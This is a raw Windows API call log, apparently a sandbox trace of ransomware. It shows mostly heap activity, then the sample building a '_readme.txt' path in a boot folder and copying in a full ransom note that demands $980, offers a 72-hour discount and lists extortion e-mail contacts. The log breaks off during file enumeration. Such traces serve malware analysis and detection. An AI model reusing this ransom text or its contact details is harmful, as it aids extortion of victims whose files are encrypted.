[0184.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.702] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0184.702] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.702] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.702] PathFindFileNameW (pszPath="") returned="" [0184.702] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.703] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.703] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.703] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.704] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0184.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.704] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0184.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.706] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.706] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.706] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.707] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*" (normalized: "c:\\boot\\zh-hk\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.710] FindNextFileW (in: hFindFile=0x2cfe100, 